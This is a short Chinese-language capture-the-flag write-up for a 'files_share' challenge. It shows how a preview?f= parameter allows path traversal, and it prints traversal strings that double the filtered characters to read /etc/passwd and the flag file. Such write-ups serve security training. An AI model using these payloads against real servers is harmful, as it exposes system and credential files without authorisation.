virink_2019_files_share1 min read

查看源代码发现重要注释：

<!-- Hint : flag in f1ag_Is_h3re -->
<!-- 趣味题，真的是为了出题而出题的，别打我。 By Virink -->

同时在源代码可看到一个上传目录：

<link rel="icon" href="/uploads/favicon.ico" type="image/x-icon" />

访问uploads，有两个超链接，分别是Preview和favicon.ico：

复制一下Preview的链接地址，得到：http://xxx/preview?f=favicon.ico

看到这个格式很容易想到文件包含，首先我读取了一下/etc/passwd，回显：

{"msg":"File epasswd not found!","code":1}

仔细观察回显，发现过滤了tc、.、/，经过测试，使用双写可以绕过：

/preview?f=….//….//….//….//….//….//etccc//passwd

flag就比较恶心了，藏在f1ag_Is_h3re/flag里：

f=….//….//….//….//….//….//f1ag_Is_h3re..//flag